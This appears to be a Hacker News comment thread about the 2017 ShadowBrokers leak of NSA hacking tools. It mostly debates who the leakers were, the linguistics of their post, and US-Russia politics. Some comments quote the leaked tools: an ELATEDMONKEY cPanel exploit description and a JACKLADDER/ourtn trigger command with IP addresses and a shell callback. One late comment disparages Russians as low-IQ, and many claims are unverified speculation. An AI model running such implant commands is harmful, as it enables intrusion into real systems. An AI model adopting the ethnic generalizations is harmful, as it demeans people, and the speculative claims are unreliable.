When Federal agencies discover a new vulnerability in commercial
and open source software – a so-called “Zero day” vulnerability
because the developers of the vulnerable software have had zero days
to fix it – it is in the national interest to responsibly
disclose the vulnerability rather than to hold it for an investigative
or intelligence purpose.
> Unless there is a clear national security or law enforcement need, this process is biased toward responsibly disclosing such vulnerabilities.
...due to the fact that most of the EQG vulnerabilities appear to be crafted for specific collection targets, not stumbled upon and held onto for fun.
Intuitively it seems when the same agency performs both roles it creates a conflict of interest and bias against disclosure.
That government is best which governs least.
Genuinely curious, what would be the gain in doing that?
The origin of 0-day (zero-day) in hacking (etymology of zero-day): http://bjorn.kuiper.nu/tag/zero-day/
I've looked through some of the contents.. Some look incredibly old, but others target odd things.. lots of cPanel. My only guess is take the low hanging fruit to build "jump box" type systems?
Some odd examples: ElegantEagle/toffeehammer.. focuses on cgiecho for RCE. The thing is, a CVE was just released for this case maybe a month ago?: http://www.cvedetails.com/cve/CVE-2017-5613/
So if this dump was from 2013, why did the CVE recently pop up? Or is that coincidence?
And the idea that you can figure out where someone is from by analyzing their written text is as fascinating as doing the same to their code.
That idea is quite well known, so it's likely that the post was written like that deliberately. I was just wondering if you could create a similar sounding post with a chain of people rewriting the original in their own words.
2017 in a nutshell right there.
It really harkens back to much of the Republicans' desire for anti-scientific thoughts, and lack of critical thought. It also explains the overly simplistic thought of "Well, the weather is nice, this climate change must be bullshit".
Don't get me wrong, I think the Democrats have significant problems of their own. For example, they're not able to properly convey scientific thought to the masses, and instead rely on shaming and insulting. That's not exactly a way to engender people to your view.
The BS one hears today (against Russia, etc) are the "WMD"s of 2017.
There's a single superpower the last 2+ decades (Russia is no USSR) and it has a long history of pushing for its "interests" all over the world, starting wars, grabbing resources, overthrowing governments, supporting all kinds of lunatics and dictators.
And covering the whole damage they do with holier than though finger pointing, made up stories, and generally BS they serve a docile and mostly ignorant on anything happening outside their home state, much less worldwide, population. Or, actually, worse than ignorant: mostly informed from mainstream tv news presenting them the "enemy du jour", but with a complete lack of context and history, and with any nuance and details jumbled up in their minds (in a "Go to Austria, see the kangaroos" fashion).
Whether its a Joe Sixpack or a college educated person, in the majority of cases they equally lack context and perspective, and have no real reason to even try to get one, since they have no skin in the game: some other poor suckers will go and fight (e.g. literally poor whites, blacks and latinos going into service) and some remote countries will pay the toll, so no big deal.
Also it's remarkably unfair for you to cherry pick our foreign policy misdeeds while leaving out all of the good we've done over that same time frame.
I wish we cultivated a better interest in world news and culture here. Our natural borders play some (small) role in our isolation. But, yes, the population at large also ignores much of the global news.
Considering the US government and it's MSM propaganda machine tell only one side of the story, I'd think you'd be comfortable with someone telling the other side of that story, if it's fairness you're seeking of course.
Do not trust the people telling you Russia is behind all of these problems for the US. Even if it's true, it's a fraction of Russians that are guilty, and if you judge the whole population by what they've done Americans are guilty of a whole hell of a lot too.
The problem with trying to unravel the truth about Russian hacking is that both sides have similar incentives to play up the drama: For the West to paint Russia as a threat plays straight into an agenda of making Russia seem relevant and powerful. Because of that, there's no reason for Putin to try particularly hard to squash allegations whether they're true or false.
Sure, but at the level Russia can afford, and "puppeteering the US president" is a BS claim way above that, tailor-made for a nation spoon-fed with shows like 24 and Homeland and endless claims about how all the world "plots against it" while itself does exactly that globally (and nobody bats an eyelid).
And while Russia/Putin will use such tactics for their country's (and/or his own) immediate interests/survival (e.g. in Crimea, a place with a huge majority of ethnic Russians, or the middle east), they don't have neither the means or the history of meddling and plundering all over the world.
The claims are mostly a way to invent a present-day Bond villain, an easily identifiable target, like it has been played out tons of times in the past. Russia has too many natural resources and wants to control its periphery, something that goes against the general "interests" and plundering intentions of outside players, hence the pressure, combined with the constant post-Cold-War expansion of Nato to suffocate them.
If instead of Putin there was some friendly dolt selling Russia wholesale to foreign corporate interests (instead to national players that the country can somewhat control -- something which is labeled "cronyism"), like e.g. Yeltsin, it would be all love and hugs with EU and the US, even if they did ten times worse in freedom internally. You know, like those lovable Saudis.
I've noticed, say, that in Poland, where the native tongue lacks articles, people regularly mess up "the" and "a," or miss them altogether. I've never met a French person with the same issue, for obvious reasons.
When I started looking into people's mistakes with tenses in English - dear god, so much about my native tongue that I had no idea about, and yet made particular nationality error combinations really stand out. It's crazy fun.
Edit: and I love my eldest's progress with English. While she's basically a bilingual preschooler, she tends to speak English with polish word order: I like cars red. Her natural instinct is to also use the polish rules for nouns when choosing he/she/it. It's an absolutely fascinating process I feel privileged to observe.
Interestingly, that word order is also valid English, though it has a slightly different meaning than "I like red cars".
Example: "I like [my] soup warm".
"I like soup warm, but you can eat it cold and left over if you want."
"I like having soup warm"
"I like my cookies freshly baked"
"I like men muscular and toned"
"I like my women blonde, so you can go for the brunette"
"I like cars red" doesn't quite work as well but doesn't seem wrong. Add a little context and it seems more normal. "As a buyer of many sports cars, I like my cars red, even despite the speeding tickets I get".
Perhaps a linguist could explain how this phrasing works.
(That said, of course I advocate teaching her to speak fluently and to use that word order only when she intends its subtlety of meaning.)
What do you want?
- I want tea.
How do you want your tea?
- I want my tea hot with sugar.
Perhaps, besides the fun of imagining someone having to explain to McCain what a "double dutch rudder" is, the language serves a higher purpose of increasing virality and impact.
They could be haven trying to disguise themselves, maybe fearing a grammatical analysis or somehow exposing some fingerprint in how they construct sentences.
And as throwaway claimed, if you speak both English and Russian (I do), and have heard many others who speak both English and Russian for a many years you start to pick up patterns and understand when someone is speaking with a fake-make-it-sound-Russian style.
Or it is Russian and they intentionally formulated this as cartoonesque Russian, so that everyone says "this can't possibly be Russian, it's someone who tries to put the blame on Russia".
The problem is that if this comes from a government power, it is likely that they have the resources to use some professional translators and/or linguists to make it look whatever they want it to look like.
Anything here that is not backed by other data is just pure speculation.
>since they can't just say "I work for Russia and we're reminding America that they're not invulnerable."
But the person who replied is saying how the grammatical obfuscation doesn't look like something that's done by a Russian but by an English speaker who is trying to sound like a Russian with bad English. Because a Russian with bad English wouldn't make those mistakes.
It's weird to me that you're trying to push this to blame another group so quickly, especially with an 8 day old account.
does not imply it was done by a Russian.
that's not exactly hard for anyone that payed even a little attention during the very controversial US political season in 2016. Same with Brexit. The terminologies and crux issues have been widely debated on the social web. I would say it has actually been very difficult to escape
What a weird thing to say. Even the most native of idioms can be learned, and there are plenty of fully bi-tri lingual people in the world.
Mining the text for cultural clues is a fool's errand.
Whatever's written in that blog post, and how it's written, is neither enough to convict nor exonerate.
But when the Shadowbrokers leak appeared, the community response was more like "wat."
Are you saying there's some letter written in broken english that's being used as proof of Russian involvement in the DNC hacks?
No, but since you're obviously confused let me explain which thread we're in. The common topic, stretching back to the top comment, is armchair linguistic "analysis" :
>> (throwaway71958) Well, there's no Russian first-language bias in that text for sure. Another argument in favor of the opinion that this was written by an American: the author seems to be well versed in the memes of the US political discourse. Someone from outside the US is unlikely to even know or care about Trump's "movement", or who "Bannon" is, or "drain the swamp", or "white privilege" etc. They're also unlikely to abbreviate "New York Times" as "NYT". The telltale signs are all over the text.
>> (atemerev) Yes, exactly. While those are still somewhat plausible (I am Russian, and I might have occasionally used all of these ironically), it was "POTUS" and "SCOTUS" that made me 99% sure that this text was written by an American (or at least a US insider). You guys love your acronyms.
>> (doktrin) I honestly don't know why you guys are trying to divine identity based on textual clues like this. It's safe to assume every stylistic and linguistic choice is deliberate.
>> (throwaway71958) Sure. But if that's what you really think, then you don't get to assume that the DNC was hacked "by the Russians". Agreed?
>> (doktrin) Are you saying there's some letter written in broken english that's being used as proof of Russian involvement in the DNC hacks?
>> (jessaustin) Now that we know the "tools used" "proof" is worthless because CIA uses those tools too, is there anything else?
>> (doktrin) What does that have to do with my point about inferring identity based on textual clues in this blog post?
Which brings us back to the present - as you can see, it's you and throwaway who are trying to derail the thread at the last minute with red herrings about the DNC hacks. I'm not sure why you feel like it's super relevant here.
> Bonus points: you've used the phrase "paid shills" twice!
Again : you're confused. I used the phrase once (the other "use" you're thinking of was obviously a citation)
It would vary depending on the meaning in English, too.
The kind of caucus that nominates candidates would be "выборный съезд".
Congressional caucus is actually trickier, just because there's usually no close equivalent in other parliamentary systems (including the Russian one). It's like a political faction, but 1) its platform is not all-encompassing, and 2) its membership is not exclusive (i.e. people can, and normally do, belong to several different caucuses). For that, I don't think there's any good word other than loaning the English word directly.
"TheShadowBrokers is having special trick or treat for Amerikanskis tonight."
I suppose though, that "Amerikanski" might be used outside Russia. Serbia, Bulgaria? Misdirection seems more likely though.
A much more common mistake you will find is not knowing when to use "the" or "a".
Edit: unless it is a Russian pretending to be an American who is pretending to be Russian which, who the hell knows, anything is possible.
"Let us be speaking regarding corruption"
That sounds like a common phrasing I hear from Indians who aren't native English speakers.
So maybe Indian pretending to be an American pretending to be Russian? Heh.
But the correct use of definite and indefinite articles indicates someone with a more than competent knowledge of English (whatever their nationality may be).
Implausible, I guess. It feels more like somebody faking a russian person writing in english for obfuscation rather than deception purposes.
In English, the noun describing the nationality is also an adjective describing belonging to, or affiliation with, that nationality. E.g. "An American is driving an American car".
In Russian, this is not the case - they are different words, sharing the same root. Some examples (noun - adjective):
US: Amerikanets - Amerikanskiy
EN: Anglichanin - Angliyskiy
DE: Nemets - Nemetskiy
AR: Arab - Arabskiy
CN: Kitaets - Kitayskiy
There's one and only one exception, and that, ironically, is the word for "Russian": "russkiy". It's the same for both the noun and the adjective, and, as you can see by comparing it with the list above, morphologically it looks like an adjective. The historic explanation for that is that it originated from the time of the Varangian conquest of Eastern Slavic lands, when the population was referred as "the people of [belonging to] Rus" - "Russkie lyudi" - where Rus was the name of the Varangian tribe in question.
Anyway, what this means is that no native Russian speaker would use the word "Amerikanskiy" to refer to Americans. It only makes sense as an adjective in "American something". However, the addition of "-s" at the end to indicate plural unambiguously tells us that whoever wrote this, treated it as a noun. Which would make perfect sense for a native English speaker, for whom the two are naturally conflated.
And the most obvious explanation for that is that if you put the word "American" by itself into Google Translate, for example, it can't decide whether it's a noun or an adjective without context, so it has to assume one or the other. And it seems to be assuming adjective by default, so you get "Amerikanskiy" back.
Oh, and by the way, writing at as "Amerikanski", without the final "y", is also something that hints strongly that it's not a native speaker. A native speaker would likely transliterate it letter by letter, starting from Russian "Американский", yielding "Amerikanskiy". However, that final "y" is really short when spoken, which is why native English speakers often miss it entirely when transcribing.
On top of that, Polish uses "-ski" for the same words: "polski", "rosyjski", "angielski", "arabski" etc. In Polish, it's also a very common (and ethymologically related - think "of ...") ending for last names - e.g. Piłsudski. There are a lot more Poles, or at least families with Polish ancestry, in US in particular than there are Russians. As a result, Polish last names are pretty common and well-known, as is their spelling. So, that spelling is often applied to vaguely similarly looking and sounding Russian loanwords and transliterations, which also leads to dropping of that final "-y" in "-skiy".
So, definitely not Russian, and overall slightly more probable to be a native English speaker from US.
That's, of course, assuming that the wording wasn't deliberately mangled to look like fake Russian, in a double misdirection...
"This is probably some Russian mind game, down to the bogus accent"
Sounds like a villian from a 60's Bond flick.
I thought the folks who were acting concerned about the young throwaway accounts were just being paranoid. Until the next sequential throwaway account showed up and piled on. What gives? Is HN influential enough to deserve astroturfing / propaganda from state intelligence services?
And here's some Russian perspective on "draining the swamp": that's actually one thing Putin did when he came to power. Under Yeltsin, the government was basically run by oligarchs, and they could do whatever the hell they wanted. Putin and Russia's security/intelligence community that installed him laid down the ground rules, and made it clear that from there on out orders would be coming down from the Kremlin, not the other way around. One oligarch rebelled (Khodorkovsky) and was put in prison for a decade. Which, by the way, was entirely deserved. Most Russians were disappointed that other oligarchs didn't follow.
The issue with "draining the swamp" is that this creates voids that other people fill. Which they did under Putin. So even though oligarchs are pretty obedient now, there's a much stronger swamp sub-structure of Putin's pals under the covers which is darn near impossible to remove until he dies, and they're all under his control.
So armed with this perspective, I like two features of the US political system that many other Americans (native and naturalized) intensely dislike: the divided congress and the constant Mexican standoff between the executive and the legislative branch. If those guys could agree on anything, that's when we'd really be in trouble. Case in point is once again Russia, where the executive branch can request whatever laws it wants and be 100% sure they'll pass the Duma. The result is predictable: harebrained laws protecting the incumbent regime.
Slightly tongue in cheek, but only slightly.
Then again, I'm sure that there are enough people and intelligence services in play to make everything confusing.
Is that not the comment you were calling correct?
That's what "the person [you] replied to" was talking about, that use of the word prejudice.
That is what the person I replied to actually said, and the comment I was clearly referring to; the point being of course, that a discussion of the Russian government has no more to do with the Russian people than the Russian government does.
1. When you made https://news.ycombinator.com/item?id=14069152 you may have thought it "clearly" referred to the sentence by burkaman, but multiple people thought you were refuting burkaman and referring to snowpanda's comment.
2. Even though you were referring to burkaman's comment, he was directly talking about the sentence that used the word prejudice, and arguing that it was not prejudice. Your claim in https://news.ycombinator.com/item?id=14069723 and https://news.ycombinator.com/item?id=14071992 that burkaman was not saying anything about prejudice is untrue. He was directly refuting a claim of prejudice.
For a well documented case: http://www.stratcomcoe.org/internet-trolling-hybrid-warfare-...
So does JTRIG, and probably many other groups as well. Russia isn't the only suspect for this kind trolling.
Human rights violations in the U.S. are also well documented by China:
Likewise, Russia has a well documented history of sponsoring online propaganda campaigns, and most people who aren't delusional or paid shills would agree.
Two negative things about two different countries can in fact both be based in truth. Weird.
So why do we say "the Russians" and "the Chinese" as though they each form a political whole.
I mean, we know the CIA gets up to some pretty nefarious shenanigans, quite possibly without the express approval of The Administration.
It just seems like a lot of pots sitting around talking about how black the kettles are. Sure, some kettles are blacker than some pots.
But hey, if you already wrote off anyone who disagrees as "delusional or paid shills" then you're too far gone to reason with. Literally nothing anybody ever says can make you think twice.
> if you already wrote off anyone who disagrees as "delusional or paid shills" then you're too far gone to reason with. Literally nothing anybody ever says can make you think twice.
Not true, but it would definitely take more than that hand-wavy uncertainty yarn you're trying to spin
And as was already pointed out, you stated that "Russia sponsors" but even the first article states that the alleged project is the work of one guy who apparently has money to burn - not the government.
I very much doubt they're competent enough to pull something like this convincingly here in the US and avoid early detection and counter-intelligence response. Thus far no evidence whatsoever was presented that any of this was Russian, let alone state sponsored. That's either some truly elite level GRU work, to the standard we have not ever seen before, or there is, in fact, no "paid Russian trolls" on The_Donald. My opinion: there's no way in hell they could pull this off without getting noticed _well before_ the anointed Democratic candidate lost the election.
Christ, even the Canadian government does this, and we're about as unsophisticated as it gets.
The naivete of people getting their panties in a bunch over the revelation that The Evil Russians participate in hacking and propaganda, how can you be so unaware of how the world works?
gamergate, /pol, /b, alt-right, the_donald, antifa use online trolling. In context, saying a state actor uses online trolling is an extremely conservative claim. I'm sure there's online trolling in favor of and sponsored by US, Chinese and Macedonian interests (to name a few) too - but Russia's actions are much better documented.
Disagree. There's no such thing as perfect certainty, but the only real question about Russian troll sponsorship is one of scale.
> US's sponsorship is objectively less probable: English being lingua franca hampers American wannabe "hybrid trolls"
This is an interesting observation, but I think you either underestimate American resources, or overestimate the logistics of online influence manipulation campaigns.
For illustration : there are about 1m fluent Russian speakers in the US, and about 4m fluent English speakers in Russia. Sure, it's a bigger talent pool : but both countries could rope in bilingual cyber propagandists by the thousands if they felt so inclined.
Anyway, while their nationality isn't obvious, their childishness is. I think that's the only detail that can really be gleaned from the text itself.
"Quick review of the #ShadowBrokers leak of Top Secret NSA tools reveals it's nowhere near the full library, but there's still so much here that NSA should be able to instantly identify where this set came from and how they lost it. If they can't, it's a scandal."
The security agencies might have made a lot of enemy over the years so it's not clear who benefits from this. Either financially or as ego boost.
The internet is definitely bigger that what most people might have predicted 20 years ago. So its not really a big surprising to see as much or even more power struggle than in real world battle fields.
Since every side has a propaganda to peddle, I, personally can draw no reasonable or coherent conclusions on what type of decisions are shaping the world I live in. But I am nonetheless curious to see how this all plays out in the coming years.
There is a related post on HN about this. 
I don't necessarily subscribe to the whole "Russia is controlling everything" line (there still so much that's unknown for sure), but it sure is easy to see a connection between Trump launching missiles against Syria which is supported by Russia, and with an embarrassing and costly release of secret information belonging to the security apparatus in the U.S. by what many people say is a front for the Russian security apparatus. Whether that connection is really there is another thing, but that narrative sure is easy to follow.
I have difficulties interpreting your statement. Are you implying US security services are "a front for the rudsian security apparatus"?
I wouldn't interpret that that tweet as "lost control of its full arsenal". It seems that say that, but then it's a tweet and length-limited. Maybe let's just wait until a more nuanced analysis surfaces?
In his final days before the leak Snowden was part of the counter espionage cyber division as an NSA contractor. He was actively hacking and preventing hacks from China. These might not be part of the toolset he used, but its reasonable to believe he would have been aware of them and had access to them.
B) This dump is from 2013, not long after Snowden left, so still relevant to his knowledge on the subject. Although he wasn't trained for TAO.
It couldn't be because perl is installed by default on all of the target platforms. Practicality trumps conference talks when there's work to be done, even in the government.
Whereas, the NSA's project failed initially because the team couldn't design a security kernel that had great security and acceptable performance. Told NSA they'd have to pick one. Schell told NSA he knew a guy with a design, GEMSOS, with both properties. NSA reluctantly used GEMSOS in BLACKER. The first, highly-secure VPN w/ general-purpose kernel was born. Who knows what the deployment or usability side of it was, though. Classification rules kept them from publishing on it for a decade or so where it then got paywalled. Classification is probably why Larry Walls didn't say much about BLACKER when describing its history. At least ones I read.
A few points of note: it's rather weird to call BLACKER a "VPN"; it's likely much broader than this (it's a network, crypto suite, secure kernel, system architecture, etc), and yet encompasses a very different goal. In fact, the degree to which it originates out of secure kernel research is, we argue in our paper, somewhat unclear, and perhaps this is only a small part of the equation.
If anyone has any additional information about these early architectures, I would love to speak with you, contact me at http://iqdupont.com.
Yeah, BLACKER did quite a bit. It was a network MLS component like many others that came after it. GEMSOS, Boeing SNS Server, and DiamondTek LAN are examples. Modern variant would be an Octeon 2 or 3 PCI card with similarly secure software.
Too much to explain, though. BLACKER's main purpose was securing the connection between dumb terminals and things they connected to. It used crypto, MLS, and TEMPEST-style hardware. It was a network device as well. A VPN is closest term for modern audience to convey its main goals.
To me it seems impossible that non-state-sponsored hackers would have gotten their hands into top secret NSA hacking tools. If I'd have guess it would seem that TheShadowBrokers are "useful idiots" that Russia gives information in the way they did (probably) with Wikileaks. The real question is why would anyone leak these files at this very moment? Did it take this long to get angry at Trump or are there some others factors at play?
About as impossible as the Snowden exfiltration, so that makes it entirely believable.
All it takes is one rogue employee or plant. And if you don't want to burn an inside asset it would pay off to release files that are several years old.
> What this have do with fun Cyber Weapons Auction? We want make sure Wealthy Elite recognizes the danger cyber weapons, this message, our auction, poses to their wealth and control. Let us spell out for Elites. Your wealth and control depends on electronic data. You see what "Equation Group" can do. You see what cryptolockers and stuxnet can do. You see free files we give for free. You see attacks on banks and SWIFT in news. Maybe there is Equation Group version of cryptolocker+stuxnet for banks and financial systems? If Equation Group lose control of cyber weapons, who else lose or find cyber weapons? If electronic data go bye bye where leave Wealthy Elites? Maybe with dumb cattle? "Do you feel in charge?"
# ELATEDMONKEY is a local privelege escalation exploit against systems running the cPanel Remote Management Web Interface, at least through version 24, and probably future versions too (althogh that should be checked before throwing).
It has been tested explicitly on cPanel 11.23.3 and 11.24.4 running CentOS 5.2 Linux
Those versions are from 2008/2009
Don't underestimate the ability of failing smbs to dismiss the risks involved with that when they can't pay to fix it.
He notes that though much is targeted at older systems, a few things that look yet-unpatched.
the grugq: "Calling it now: the first ShadowBrokers dump was an expensive signal. This latest one was not (expensive, that is.)"
- Don’t care if you swapped wives with Mr Putin, double down on it, “Putin is not just my firend he is my BFF”.
- Don’t care if the election was hacked or rigged, celebrate it “so what if I did, what are you going to do about it”.
This has got to be a fake group trying to discredit Trump right? I don't like him or what he's doing, but surely surely his supporters don't subscribe to at least the latter view there?
You must not have very many conservative friends on Facebook. "Russia didn't write the emails" has to be one of the most popular memes of the last 6 months.
I don't know any conservatives but every single leftist I know thinks that russophobia is at absolutely deranged levels, as a vehicle for Clinton apologism.
The idea that "Russia decided the election" is absurd, but repeated often enough, is starting to be taken as truth by those who find it palatable.
I don't think Putin seriously believes he can control US elections and probably recognizes this as a one-off lucky break.
The whole point for him is the PR value: having Trump claim elections are rigged is pure PR gold for Putin. Having Trump claim protesters are paid Democratic shills (rather than real people who don't like him) is Putin cover. He gets to point at those words and say "see, it's the same everywhere". It gives Putin supporters cover to believe his lies and it takes the wind out of the sails of Putin's detractors.
My guess is Putin's original plan was to take advantage of Trump claiming he lost due to election rigging but we'll probably never know.
How about if Hillary simply picked Bernie as VP? Is there anyone here that thinks she wouldn't have won on that decision alone? Don't blame Bernie supporters (I am not one, to be clear), why should they walk a mile to Clinton's positions when Clinton herself won't even make the most modest concessions to their side?
The majority of Dems I know saw the election as rigged too. The Dem primary was absolutely disgusting, and then of course CNN got caught giving debate questions to Hillary.
Coined by Dawkins to describe things like; "how to make fire", as a good meme that gets passed along.
Also, a lot of the tools appear to instruct people to paste various things in to them. I find it unlikely that a single person wrote all the tooling for the NSA, but, who knows.
This is just inaccurate, or at least purposefully misleading. The NSA did not just lose control of its "Top Secret arsenal of digital weapons".
They "lost control" of mainly a bunch of old exploits whose release will not matter because anyone who is running this old junk won't be updating their servers because of this news.
18.104.22.168 - http://utc21.co.kr - Korea
JACKLADDER - triggering IN thru JACKPOP on Linux (FAINTSPIRIT)
### Local window, let this sit and wait:
ourtn -T 22.214.171.124 -n -I -ue -O 113 -p 443 -C 126.96.36.199 127.0.0.1
### on PITCH: set up window for nopen callback
I only found that bad boy out after disabling some ciphers on some loadies which broke a lot of their stuff....
It looks like it's searching for files/directories with unusual names (like ". ") that system administrators wouldn't normally notice.
I'm not from the US and have not followed the news from there recently, but from what little I have seen much of the actual contents of the message does seem to reflect the feelings of Trumps "base"? Or would people more familiar with US politics say this is incorrect?
"Are you the sort of man who would put the poison in his own goblet? Now a clever man would put the poison into my goblet, because he would know that only a fool would drink the goblet given to him. I am not a fool, so clearly you wouldn't do that. But you must have known that I was not a great fool, so I mustn't drink from the wine in front of me!" 
But really, really, really. There's just no way to know.
However, the moral I derive from this is the fact that the poison was put in both goblets.
Government organizations like the CIA are not just poisoning the other, but themselves and the people they are supposedly protecting as well.
Legacy of Ashes, et-all.
I think what you're saying is fair, but the only nation state actors with the right combination of evidence, agenda and motives would be Russia. Who else?
I do suspect a new level to the Cold War, where "Russia" was disrupting US society through many channels. Including, for example, Mad Magazine and then The Realist. We also know that "the US" was manipulating the postmodern art scene. Organizing groups, publishing magazines, etc.
But maybe I've been manipulated to think that, by some third party, which has an interest in global disorder. It's very hard to find reliable information, when nothing is what it seems.
Remember that even naming these two countries is a bias unless there is specific evidence. America and Russia are obvious suspects, but other countries (and even non-state actors).
There is very little actual evidence and far too much time spent on useless - and distracting - speculation.
> Even HN seems to have a "of course it's Russia" bias these days.
I suspect a lot of people are still using cold war era standards for how propaganda works. The modern methods are a lot more subtle. A potential example might be this very thread where a lot of people seem to be wasting time speculating about the leak's origins instead of looking at the actual evidence that is available: the software itself.
 e.g. Russia's "non-linear warfare" methods that introduce as much confusing/distracting chaos as possible, or the psychological wedges JTRIG (GCHQ) uses to split communities before they grow into larger "problems".
Russians are known for what they themselves call "asymetrical answers", so this seems to fit the pattern.
Source: many conversations with Russians learning English (also near-native Russian)
Not because I'm especially interested in the tools (although, granted, I have not had a look at any of them yet), but because I always wished this could be given to everyone.
Also, for a moment there, I was concerned 7z was insecure and that the passphrase had been bruteforced. Apparently not! Very nice.
This is disaster in my (current) opinion. We tend to dismiss the work the likes of NSA do, not thinking much about what would happen if they didn't do it. Snowden categorically dismissing anything that NSA does, just means he's a deluded idealist, much like I used to be.
That's not representative of Snowden's opinion at all. From the beginning he's always stated he believes in the mission of the intelligence agencies. Heck, he used to work for one.
"I am not trying to bring down the NSA, I am working to improve the NSA" 
We make a kind of deal with our governments, some things we agree to be kept in the dark about for security reasons (specific intelligence or some clandestine operation or other) but I don't think that deal covers the kind of surveillance snowden exposed and I don't see at all how exposing the actions of our governments is deluded or idealistic: can you elaborate?
Why would you prefer not to know what your government is doing when knowing doesn't break the 'willful ignorance' contract we entrust these people with?
If I two terrorists agree to act when a nyan cat is posted on a specific Facebook account no neural network can help you manage the threat. Human based investigation and infiltration on the other hand can lead to real world judiciary actions.
Then, of course, there's also the objection that "keeping us safe" is not an absolute. There are many ways to keep people safe, but they're so extremely onerous that we don't practice them. Totalitarian societies with pervasive open surveillance (think 1984) are very safe, for example, but at what cost? So clearly there's a balance, and one can't just dismiss any concerns about the cost of that safety by saying that it's necessary - it has to be demonstrated that it is (i.e. that the gains from that increased safety justify the losses from intrusiveness).
"Just because you shot Jesse James, don’t make you Jesse James.”
Snowden is skilled at data theft and not a source of wisdom when it comes to surveillance.
The liberal media (hate to use that term) is equally complicit. They have trotted him around as source of wisdom. The leaker of Pentagon Papers had a position that allowed him to asses the subject matter. Snowden on the other hand was a sysadmin.
A lot of people died, it would be naive to think snowden's actions didn't contribute to it. However noble his intentions might be.
100% American from Georgia, sometimes loses Russian accent and slips into perfect English:)
Could be Russia pissed about puppet twitching without permission, or could be Bannon (via Cambridge Analytics?) pissed about puppet twitching without permission.
Twitch, puppet, twitch!
but really, asymmetric information is asymmetric. We just don't know.
But now we can speculate that they are American citizens, with their mention of voting for the US President.
We've detached this subthread from https://news.ycombinator.com/item?id=14069328 and marked it off-topic.
Identifying specific malicious actors (and their origin) is tricky from a reader's POV, so the best I can personally do is not let ridiculous statements go unanswered. Ignorance is more common than malice, but I'm sure there's a bit of both in here today.
Or so a 2017 version of the "red scare" goes, so that the military industrial complex can sell more weapons and more "safety", and the fingers can keep being pointed at some enemy or another. That way their budgets get approved, some poor countries pay the toll (who cares anyway), and they might even be able to plunder them afterwards. Worked wonders the last 30+ years.
Not to mention that the US sponsors tons of NGOs, magazines, organizations, events, political parties, etc, with favorable views to its interest all over the world, and has done that none stop since at least WWII, meddling with elections, paying journalists, etc -- and when nothing else works.
Now, regarding the accusation of "whataboutism", I found that it's the stupidest of knee-jerk responses. It makes looking at all sides look like some kind of error.
"Yeah, my side can kill, invade, meddle with others, bully, strong-arm, etc as it sees fit. But if your side does 1/10th of those things even when its justified, or even if I just accuse you falsely of doing them and you dare to point out that it's actually my side doing those things and worse, then I call out your whataboutism".
Instead of putting things into perspective, examining their history, the causes, the role of different players, people point the finger to a single direction (seldom to their own side's and rarely to the biggest offender), and when called out on it and get reminded of the greater state of affairs they go "oh, that's whataboutism".
It is Russians. The classic example of Dunning Kruger effect. In a generally low IQ environment and primitive criminalized cultural environment they truly believe that what is enough to fool everyone around them, including the bosses (who are supposed to be really smart), will surely fool everyone else.
This is the phenomenon of negative selection of a cancer-like corrupted society (which ran for a three decades already) at work. They are literally decades behind of the technological progress and culture of the modern civilization.
They simply have no idea of what possible level of intelligence and sophistication could be found in places with decades of consistent high-IQ-based selection, like companies staffed with top 5% of MIT/Standford/Caltech/Berkeley graduates and what this kind of organization could do (think of Apple, Google, etc).
A high-tech US govt agency would never had such a crap in their folders. They are not a bunch of disconnected from reality, overconfident, self-deluded with their own primitive propaganda Russian punks.